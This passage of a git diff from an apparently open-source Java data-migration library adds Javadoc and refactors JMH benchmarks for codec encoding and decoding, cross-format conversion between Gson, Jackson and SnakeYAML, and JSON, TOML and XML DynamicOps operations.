+ * Benchmarks long value encoding to JSON.
+ *
+ *
Measures the performance of converting a Java {@code long} to a
+ * JSON number element via {@link Codecs#LONG}.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeLong(final Blackhole blackhole) {
- final DataResult result = Codecs.LONG.encodeStart(GsonOps.INSTANCE, TEST_LONG);
+ final DataResult<JsonElement> result = Codecs.LONG.encodeStart(this.ops, TEST_LONG);
blackhole.consume(result);
}
+ /**
+ * Benchmarks long value decoding from JSON.
+ *
+ *
Measures the performance of extracting a Java {@code Long} from a
+ * pre-encoded JSON number element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeLong(final Blackhole blackhole) {
- final DataResult> result = Codecs.LONG.decode(GsonOps.INSTANCE, this.encodedLong);
+ final DataResult> result = Codecs.LONG.decode(this.ops, this.encodedLong);
blackhole.consume(result);
}
- // ==================== Float ====================
+ // ==================== Float Benchmarks ====================
+ /**
+ * Benchmarks float value encoding to JSON.
+ *
+ * <p>Measures the performance of converting a Java {@code float} to a
+ * JSON number element via {@link Codecs#FLOAT}. Float encoding involves
+ * decimal representation which may differ from integer encoding.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeFloat(final Blackhole blackhole) {
- final DataResult result = Codecs.FLOAT.encodeStart(GsonOps.INSTANCE, TEST_FLOAT);
+ final DataResult result = Codecs.FLOAT.encodeStart(this.ops, TEST_FLOAT);
blackhole.consume(result);
}
+ /**
+ * Benchmarks float value decoding from JSON.
+ *
+ * <p>Measures the performance of extracting a Java {@code Float} from a
+ * pre-encoded JSON number element. Decoding involves parsing the decimal
+ * representation back to IEEE 754 single-precision format.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeFloat(final Blackhole blackhole) {
- final DataResult> result = Codecs.FLOAT.decode(GsonOps.INSTANCE, this.encodedFloat);
+ final DataResult> result = Codecs.FLOAT.decode(this.ops, this.encodedFloat);
blackhole.consume(result);
}
- // ==================== Double ====================
+ // ==================== Double Benchmarks ====================
+ /**
+ * Benchmarks double value encoding to JSON.
+ *
+ * <p>Measures the performance of converting a Java {@code double} to a
+ * JSON number element via {@link Codecs#DOUBLE}. Double encoding preserves
+ * higher precision than float but uses similar mechanisms.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeDouble(final Blackhole blackhole) {
- final DataResult result = Codecs.DOUBLE.encodeStart(GsonOps.INSTANCE, TEST_DOUBLE);
+ final DataResult result = Codecs.DOUBLE.encodeStart(this.ops, TEST_DOUBLE);
blackhole.consume(result);
}
+ /**
+ * Benchmarks double value decoding from JSON.
+ *
+ * <p>Measures the performance of extracting a Java {@code Double} from a
+ * pre-encoded JSON number element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeDouble(final Blackhole blackhole) {
- final DataResult> result = Codecs.DOUBLE.decode(GsonOps.INSTANCE, this.encodedDouble);
+ final DataResult> result = Codecs.DOUBLE.decode(this.ops, this.encodedDouble);
blackhole.consume(result);
}
- // ==================== String ====================
+ // ==================== String Benchmarks ====================
+ /**
+ * Benchmarks string value encoding to JSON.
+ *
+ * <p>Measures the performance of converting a Java {@code String} to a
+ * JSON string element via {@link Codecs#STRING}. String encoding may involve
+ * escape sequence handling for special characters.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void encodeString(final Blackhole blackhole) {
- final DataResult result = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING);
+ final DataResult result = Codecs.STRING.encodeStart(this.ops, TEST_STRING);
blackhole.consume(result);
}
+ /**
+ * Benchmarks string value decoding from JSON.
+ *
+ * <p>Measures the performance of extracting a Java {@code String} from a
+ * pre-encoded JSON string element.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
public void decodeString(final Blackhole blackhole) {
- final DataResult> result = Codecs.STRING.decode(GsonOps.INSTANCE, this.encodedString);
+ final DataResult> result = Codecs.STRING.decode(this.ops, this.encodedString);
blackhole.consume(result);
}
- // ==================== Round Trip ====================
+ // ==================== Round-Trip Benchmarks ====================
+ /**
+ * Benchmarks complete integer round-trip (encode then decode).
+ *
+ * <p>Measures the combined performance of encoding a Java {@code int} to JSON
+ * and immediately decoding it back. Uses direct result extraction via
+ * {@code result().orElseThrow()} to measure the typical non-functional usage pattern.
+ *
+ * <p>Round-trip performance is important for scenarios where data is temporarily
+ * serialized (e.g., caching, IPC) and immediately deserialized.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
- public void roundTripInt(final Blackhole blackhole) {
- final DataResult encoded = Codecs.INT.encodeStart(GsonOps.INSTANCE, TEST_INT);
- final DataResult> decoded = encoded.flatMap(
- json -> Codecs.INT.decode(GsonOps.INSTANCE, json));
+ public void roundTripIntDirect(final Blackhole blackhole) {
+ final JsonElement json = Codecs.INT.encodeStart(this.ops, TEST_INT).result().orElseThrow();
+ final Pair decoded = Codecs.INT.decode(this.ops, json).result().orElseThrow();
blackhole.consume(decoded);
}
+ /**
+ * Benchmarks complete string round-trip (encode then decode).
+ *
+ * <p>Measures the combined performance of encoding a Java {@code String} to JSON
+ * and immediately decoding it back. String round-trips may involve additional
+ * overhead from string object creation compared to primitive numeric types.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
@Benchmark
- public void roundTripString(final Blackhole blackhole) {
- final DataResult encoded = Codecs.STRING.encodeStart(GsonOps.INSTANCE, TEST_STRING);
- final DataResult> decoded = encoded.flatMap(
- json -> Codecs.STRING.decode(GsonOps.INSTANCE, json));
+ public void roundTripStringDirect(final Blackhole blackhole) {
+ final JsonElement json = Codecs.STRING.encodeStart(this.ops, TEST_STRING).result().orElseThrow();
+ final Pair decoded = Codecs.STRING.decode(this.ops, json).result().orElseThrow();
blackhole.consume(decoded);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java
new file mode 100644
index 0000000..5720cfc
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java
@@ -0,0 +1,163 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Codec-focused JMH benchmarks for the Aether DataFixers framework.
+ *
+ * <p>This package contains benchmarks that measure the performance of codec operations,
+ * including encoding (Java objects to serialized format) and decoding (serialized format
+ * to Java objects). These benchmarks establish baseline performance for the codec system
+ * and help identify bottlenecks in serialization pipelines.
Scaling with collection size, functional vs direct API overhead
+ *
+ *
+ *
+ *
Why Codec Benchmarks?
+ * <p>Codecs are fundamental to the DataFixer system, transforming data between typed
+ * Java objects and format-agnostic {@link de.splatgames.aether.datafixers.api.dynamic.Dynamic}
+ * representations. Understanding codec performance is essential for:
+ *
+ *
Baseline establishment: Primitive codecs set the lower bound for all
+ * codec operations; complex codecs compose these primitives
+ *
Bottleneck identification: Comparing encode vs decode reveals which
+ * direction is more expensive for a given type
+ *
Scaling analysis: Collection benchmarks show how performance changes
+ * with data volume
+ *
API comparison: Direct extraction vs functional composition may have
+ * different performance characteristics
{@link de.splatgames.aether.datafixers.benchmarks.concurrent concurrent} -
+ * Codec thread-safety is assumed; concurrent benchmarks validate this assumption
+ *
+ *
+ *
Supported Serialization Formats
+ * <p>These benchmarks use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps}
+ * as the reference DynamicOps implementation. The codec system supports multiple formats:
+ *
+ *
JSON: GsonOps, JacksonJsonOps
+ *
YAML: SnakeYamlOps, JacksonYamlOps
+ *
TOML: JacksonTomlOps
+ *
XML: JacksonXmlOps
+ *
+ * <p>Future benchmarks may compare performance across different DynamicOps implementations.
+ *
+ * @see de.splatgames.aether.datafixers.benchmarks.codec.PrimitiveCodecBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.codec.CollectionCodecBenchmark
+ * @see de.splatgames.aether.datafixers.api.codec.Codec
+ * @see de.splatgames.aether.datafixers.api.codec.Codecs
+ * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
+ * @since 1.0.0
+ */
+package de.splatgames.aether.datafixers.benchmarks.codec;
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
index e60fd60..c74d288 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/core/SingleFixBenchmark.java
@@ -114,7 +114,8 @@ public class SingleFixBenchmark {
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void singleRenameFix(final SizedState s, final Blackhole blackhole) {
+ public void singleRenameFix(final SizedState s,
+ final Blackhole blackhole) {
blackhole.consume(s.fixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
s.input,
@@ -133,7 +134,8 @@ public void singleRenameFix(final SizedState s, final Blackhole blackhole) {
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
- public void identityFix(final SizedState s, final Blackhole blackhole) {
+ public void identityFix(final SizedState s,
+ final Blackhole blackhole) {
blackhole.consume(s.identityFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
s.input,
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
index 0cd6961..ac0bce9 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/CrossFormatBenchmark.java
@@ -24,8 +24,6 @@
import com.fasterxml.jackson.databind.JsonNode;
import com.google.gson.JsonElement;
-import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
-import de.splatgames.aether.datafixers.api.dynamic.DynamicOps;
import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator;
import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize;
import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
@@ -49,12 +47,124 @@
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark for cross-format conversion performance.
+ * JMH benchmark for cross-format conversion performance between DynamicOps implementations.
*
- * <p>Measures the overhead of converting data between different
- * DynamicOps implementations using {@link DynamicOps#convertTo}.
+ * <p>This benchmark measures the overhead of converting data between different
+ * serialization formats using the {@code DynamicOps.convertTo()} mechanism. Cross-format
+ * conversion is essential when integrating systems that use different data formats
+ * or when migrating data through format-agnostic DataFixers.
+ *
+ *
Conversion Pairs Benchmarked
+ *
+ *
JSON Library Conversions
+ *
+ *
{@link #gsonToJackson} - Gson JsonElement → Jackson JsonNode
+ *
{@link #jacksonToGson} - Jackson JsonNode → Gson JsonElement
Measures the overhead of converting between two JSON libraries.
+ * Both represent JSON but use different internal tree structures.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonToJackson(final Blackhole blackhole) {
- final JsonNode result = JacksonJsonOps.INSTANCE.convertTo(
- GsonOps.INSTANCE, this.gsonData.value());
+ final JsonNode result = this.jacksonJsonOps.convertTo(this.gsonOps, this.gsonRoot);
blackhole.consume(result);
}
/**
- * Benchmarks converting from Jackson JSON to Gson.
+ * Benchmarks conversion from Jackson JsonNode to Gson JsonElement.
+ *
+ * <p>Measures the reverse conversion from Jackson to Gson representation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonToGson(final Blackhole blackhole) {
- final JsonElement result = GsonOps.INSTANCE.convertTo(
- JacksonJsonOps.INSTANCE, this.jacksonData.value());
+ final JsonElement result = this.gsonOps.convertTo(this.jacksonJsonOps, this.jacksonJsonRoot);
blackhole.consume(result);
}
- // ==================== Gson <-> SnakeYAML ====================
+ // ==================== Gson <-> SnakeYAML Conversions ====================
/**
- * Benchmarks converting from Gson to SnakeYAML.
+ * Benchmarks conversion from Gson JsonElement to SnakeYAML native types.
+ *
+ * <p>Measures cross-ecosystem conversion from JSON library to YAML library.
+ * SnakeYAML uses native Java Maps and Lists internally.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonToSnakeYaml(final Blackhole blackhole) {
- final Object result = SnakeYamlOps.INSTANCE.convertTo(
- GsonOps.INSTANCE, this.gsonData.value());
+ final Object result = this.snakeYamlOps.convertTo(this.gsonOps, this.gsonRoot);
blackhole.consume(result);
}
/**
- * Benchmarks converting from SnakeYAML to Gson.
+ * Benchmarks conversion from SnakeYAML native types to Gson JsonElement.
+ *
+ * <p>Measures cross-ecosystem conversion from YAML native types to JSON tree.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlToGson(final Blackhole blackhole) {
- final JsonElement result = GsonOps.INSTANCE.convertTo(
- SnakeYamlOps.INSTANCE, this.snakeYamlData.value());
+ final JsonElement result = this.gsonOps.convertTo(this.snakeYamlOps, this.snakeYamlRoot);
blackhole.consume(result);
}
- // ==================== Jackson JSON <-> Jackson YAML ====================
+ // ==================== Jackson JSON <-> Jackson YAML Conversions ====================
/**
- * Benchmarks converting from Jackson JSON to Jackson YAML.
+ * Benchmarks conversion from Jackson JSON to Jackson YAML.
+ *
+ * <p>Measures conversion within the Jackson ecosystem. Both formats use
+ * JsonNode internally, potentially enabling optimizations.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonJsonToYaml(final Blackhole blackhole) {
- final JsonNode result = JacksonYamlOps.INSTANCE.convertTo(
- JacksonJsonOps.INSTANCE, this.jacksonData.value());
+ final JsonNode result = this.jacksonYamlOps.convertTo(this.jacksonJsonOps, this.jacksonJsonRoot);
blackhole.consume(result);
}
/**
- * Benchmarks converting from Jackson YAML to Jackson JSON.
+ * Benchmarks conversion from Jackson YAML to Jackson JSON.
+ *
+ * <p>Measures reverse conversion within the Jackson ecosystem.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlToJson(final Blackhole blackhole) {
- final JsonNode result = JacksonJsonOps.INSTANCE.convertTo(
- JacksonYamlOps.INSTANCE, this.jacksonYamlData.value());
+ final JsonNode result = this.jacksonJsonOps.convertTo(this.jacksonYamlOps, this.jacksonYamlRoot);
blackhole.consume(result);
}
- // ==================== SnakeYAML <-> Jackson YAML ====================
+ // ==================== SnakeYAML <-> Jackson YAML Conversions ====================
/**
- * Benchmarks converting from SnakeYAML to Jackson YAML.
+ * Benchmarks conversion from SnakeYAML native types to Jackson YAML JsonNode.
+ *
+ * <p>Measures conversion between two YAML libraries with different internal
+ * representations (native Java types vs JsonNode).
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlToJacksonYaml(final Blackhole blackhole) {
- final JsonNode result = JacksonYamlOps.INSTANCE.convertTo(
- SnakeYamlOps.INSTANCE, this.snakeYamlData.value());
+ final JsonNode result = this.jacksonYamlOps.convertTo(this.snakeYamlOps, this.snakeYamlRoot);
blackhole.consume(result);
}
/**
- * Benchmarks converting from Jackson YAML to SnakeYAML.
+ * Benchmarks conversion from Jackson YAML JsonNode to SnakeYAML native types.
+ *
+ * <p>Measures reverse conversion from JsonNode to native Java Maps/Lists.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlToSnakeYaml(final Blackhole blackhole) {
- final Object result = SnakeYamlOps.INSTANCE.convertTo(
- JacksonYamlOps.INSTANCE, this.jacksonYamlData.value());
+ final Object result = this.snakeYamlOps.convertTo(this.jacksonYamlOps, this.jacksonYamlRoot);
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
index 5dcccb6..d0f64b2 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/JsonBenchmark.java
@@ -49,12 +49,98 @@
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark comparing Gson and Jackson JSON performance.
+ * JMH benchmark comparing JSON DynamicOps implementations: Gson vs Jackson.
*
- * <p>Measures DynamicOps operations and migration performance for both
- * JSON implementations.
+ * <p>This benchmark measures the performance of JSON-based operations using two
+ * different underlying libraries: Google Gson ({@link GsonOps}) and Jackson Databind
+ * ({@link JacksonJsonOps}). The results help determine which implementation is more
+ * suitable for specific use cases.
+ *
+ *
Benchmark Categories
+ *
+ *
Data Generation
+ *
Measure Dynamic object construction performance:
+ *
+ *
{@link #gsonGenerate} - Create Dynamic using GsonOps
+ *
{@link #jacksonGenerate} - Create Dynamic using JacksonJsonOps
+ *
+ *
+ *
Field Access
+ *
Measure field read operations on existing data:
+ *
+ *
{@link #gsonFieldRead} - Read field from Gson-backed Dynamic
+ *
{@link #jacksonFieldRead} - Read field from Jackson-backed Dynamic
+ *
+ *
+ *
Field Modification
+ *
Measure field write/set operations:
+ *
+ *
{@link #gsonFieldSet} - Set field on Gson-backed Dynamic
+ *
{@link #jacksonFieldSet} - Set field on Jackson-backed Dynamic
+ *
+ *
+ *
Migration
+ *
Measure DataFixer migration performance:
+ *
+ *
{@link #gsonMigration} - Apply fix to Gson-backed data
+ *
{@link #jacksonMigration} - Apply fix to Jackson-backed data
{@code
+ * # Run all JSON benchmarks
+ * java -jar benchmarks.jar JsonBenchmark
+ *
+ * # Compare only field access performance
+ * java -jar benchmarks.jar "JsonBenchmark.*FieldRead"
+ *
+ * # Run Gson-only benchmarks
+ * java -jar benchmarks.jar "JsonBenchmark.gson.*"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar JsonBenchmark -p payloadSize=LARGE
+ * }
*
* @author Erik Pförtner
+ * @see YamlBenchmark
+ * @see TomlXmlBenchmark
+ * @see CrossFormatBenchmark
+ * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps
+ * @see de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -65,131 +151,258 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class JsonBenchmark {
+ /**
+ * Field name used for read/write benchmarks.
+ *
+ * <p>References the first string field generated by {@link BenchmarkDataGenerator}.
+ */
+ private static final String FIELD_NAME = "stringField0";
+
+ /**
+ * Payload size parameter controlling test data complexity.
+ *
+ * <p>Injected by JMH to run benchmarks across different data sizes.
+ */
@Param({"SMALL", "MEDIUM", "LARGE"})
private PayloadSize payloadSize;
+ /**
+ * Google Gson DynamicOps implementation.
+ */
+ private GsonOps gsonOps;
+
+ /**
+ * Jackson Databind DynamicOps implementation.
+ */
+ private JacksonJsonOps jacksonOps;
+
+ /**
+ * Pre-generated test data using Gson.
+ */
private Dynamic gsonData;
+
+ /**
+ * Pre-generated test data using Jackson.
+ */
private Dynamic jacksonData;
- private DataFixer fixer;
+
+ /**
+ * DataFixer for Gson-based migrations.
+ */
+ private DataFixer gsonFixer;
+
+ /**
+ * Optional DataFixer for Jackson-based migrations.
+ *
+ * <p>May be {@code null} if no dedicated Jackson fixer is configured.
+ * In that case, cross-format migration behavior is measured instead.
+ */
+ private DataFixer jacksonFixer;
+
+ /**
+ * Source version for migrations (v1).
+ */
private DataVersion fromVersion;
+
+ /**
+ * Target version for migrations (v2).
+ */
private DataVersion toVersion;
+ /**
+ * Initializes DynamicOps instances, test data, and DataFixers.
+ *
+ * <p>Both Gson and Jackson data are pre-generated to isolate benchmark
+ * measurements from data creation overhead (except for generation benchmarks).
+ */
@Setup(Level.Trial)
public void setup() {
- this.gsonData = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, this.payloadSize);
- this.jacksonData = BenchmarkDataGenerator.generate(JacksonJsonOps.INSTANCE, this.payloadSize);
- this.fixer = BenchmarkBootstrap.createSingleFixFixer();
+ this.gsonOps = GsonOps.INSTANCE;
+ this.jacksonOps = JacksonJsonOps.INSTANCE;
+
+ this.gsonData = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize);
+ this.jacksonData = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize);
+
+ this.gsonFixer = BenchmarkBootstrap.createSingleFixFixer();
+
+ // If you have a dedicated Jackson fixer, wire it here. Otherwise keep it null and measure cross-format explicitly.
+ // Example (if you add it later): this.jacksonFixer = BenchmarkBootstrap.createSingleFixFixerJackson();
+ this.jacksonFixer = null;
+
this.fromVersion = new DataVersion(1);
this.toVersion = new DataVersion(2);
}
- // ==================== Data Generation ====================
+ // ==================== Data Generation Benchmarks ====================
/**
- * Benchmarks Gson data generation.
+ * Benchmarks Dynamic object generation using GsonOps.
+ *
+ * <p>Measures the time to create a complete test data structure using
+ * Gson as the underlying JSON representation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- GsonOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.gsonOps, this.payloadSize);
blackhole.consume(data);
}
/**
- * Benchmarks Jackson JSON data generation.
+ * Benchmarks Dynamic object generation using JacksonJsonOps.
+ *
+ * <p>Measures the time to create a complete test data structure using
+ * Jackson as the underlying JSON representation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- JacksonJsonOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize);
blackhole.consume(data);
}
- // ==================== Field Access ====================
+ // ==================== Field Access Benchmarks ====================
/**
- * Benchmarks Gson field read access.
+ * Benchmarks field read access on Gson-backed Dynamic.
+ *
+ * <p>Measures the time to retrieve a single field from a pre-existing
+ * Gson-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.gsonData.get("stringField0");
+ final Dynamic field = this.gsonData.get(FIELD_NAME);
blackhole.consume(field);
}
/**
- * Benchmarks Jackson field read access.
+ * Benchmarks field read access on Jackson-backed Dynamic.
+ *
+ * <p>Measures the time to retrieve a single field from a pre-existing
+ * Jackson-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.jacksonData.get("stringField0");
+ final Dynamic field = this.jacksonData.get(FIELD_NAME);
blackhole.consume(field);
}
- // ==================== Field Modification ====================
+ // ==================== Field Modification Benchmarks ====================
/**
- * Benchmarks Gson field set operation.
+ * Benchmarks field set operation on Gson-backed Dynamic.
+ *
+ * <p>Measures the time to add a new field to a Gson-based Dynamic object.
+ * This operation typically creates a new Dynamic with the modified content.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonFieldSet(final Blackhole blackhole) {
final Dynamic result = this.gsonData.set(
- "newField", this.gsonData.createString("newValue"));
+ "newField",
+ this.gsonData.createString("newValue")
+ );
blackhole.consume(result);
}
/**
- * Benchmarks Jackson field set operation.
+ * Benchmarks field set operation on Jackson-backed Dynamic.
+ *
+ * <p>Measures the time to add a new field to a Jackson-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonFieldSet(final Blackhole blackhole) {
final Dynamic result = this.jacksonData.set(
- "newField", this.jacksonData.createString("newValue"));
+ "newField",
+ this.jacksonData.createString("newValue")
+ );
blackhole.consume(result);
}
- // ==================== Migration ====================
+ // ==================== Migration Benchmarks ====================
/**
- * Benchmarks migration with Gson DynamicOps.
+ * Benchmarks DataFixer migration on Gson-backed data.
+ *
+ * <p>Measures the time to apply a single fix migration to Gson-based
+ * Dynamic data. This represents the typical migration scenario where
+ * both fixer and data use the same DynamicOps implementation.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void gsonMigration(final Blackhole blackhole) {
- final Dynamic result = this.fixer.update(
+ final Dynamic result = this.gsonFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
this.gsonData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks migration with Jackson DynamicOps.
+ * Benchmarks DataFixer migration on Jackson-backed data.
+ *
+ * <p>If a dedicated Jackson fixer is available, measures native Jackson
+ * migration. Otherwise, falls back to cross-format migration using the
+ * Gson-based fixer with Jackson input data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonMigration(final Blackhole blackhole) {
- // Note: Jackson migration uses Jackson-based data
- // The fixer is Gson-based, so this tests cross-format behavior
- final Dynamic result = this.fixer.update(
+ if (this.jacksonFixer == null) {
+ // No dedicated Jackson fixer available -> this would not be a fair "Jackson migration" benchmark.
+ // Measure the cross-format behavior explicitly instead.
+ final Dynamic result = this.gsonFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.jacksonData,
+ this.fromVersion,
+ this.toVersion
+ );
+ blackhole.consume(result);
+ return;
+ }
+
+ final Dynamic result = this.jacksonFixer.update(
+ BenchmarkBootstrap.BENCHMARK_TYPE,
+ this.jacksonData,
+ this.fromVersion,
+ this.toVersion
+ );
+ blackhole.consume(result);
+ }
+
+ /**
+ * Benchmarks cross-format migration with Jackson input and Gson-based fixer.
+ *
+ * <p>Measures the performance overhead when the fixer's DynamicOps differs
+ * from the input data's DynamicOps. This scenario is common when migrating
+ * data from various sources through a centralized fixer.
+ *
+ * <p>Comparing this benchmark with {@link #gsonMigration} reveals the
+ * overhead of format conversion during migration.
+ *
+ * @param blackhole JMH blackhole to prevent dead code elimination
+ */
+ @Benchmark
+ public void crossFormatMigrationJacksonInput(final Blackhole blackhole) {
+ final Dynamic result = this.gsonFixer.update(
BenchmarkBootstrap.BENCHMARK_TYPE,
this.jacksonData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
index f618554..2dc134c 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/TomlXmlBenchmark.java
@@ -48,12 +48,100 @@
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark for TOML and XML format performance.
+ * JMH benchmark for TOML and XML DynamicOps implementations via Jackson.
*
- * <p>Measures DynamicOps operations and migration performance for
- * Jackson TOML and XML implementations.
+ * <p>This benchmark measures the performance of TOML and XML format operations
+ * using Jackson-based implementations ({@link JacksonTomlOps} and {@link JacksonXmlOps}).
+ * Both formats share Jackson's unified API, enabling direct performance comparison.
+ *
+ *
Benchmark Categories
+ *
+ *
Data Generation
+ *
Measure Dynamic object construction performance:
+ *
+ *
{@link #tomlGenerate} - Create Dynamic using JacksonTomlOps
+ *
{@link #xmlGenerate} - Create Dynamic using JacksonXmlOps
+ *
+ *
+ *
Field Access
+ *
Measure field read operations on existing data:
+ *
+ *
{@link #tomlFieldRead} - Read field from TOML-backed Dynamic
+ *
{@link #xmlFieldRead} - Read field from XML-backed Dynamic
+ *
+ *
+ *
Field Modification
+ *
Measure field write/set operations:
+ *
+ *
{@link #tomlFieldSet} - Set field on TOML-backed Dynamic
+ *
{@link #xmlFieldSet} - Set field on XML-backed Dynamic
+ *
+ *
+ *
Migration
+ *
Measure DataFixer migration performance:
+ *
+ *
{@link #tomlMigration} - Apply fix to TOML-backed data
+ *
{@link #xmlMigration} - Apply fix to XML-backed data
+ *
+ *
+ *
Implementations
+ *
+ *
Implementation
Library
Node Type
Use Case
+ *
+ *
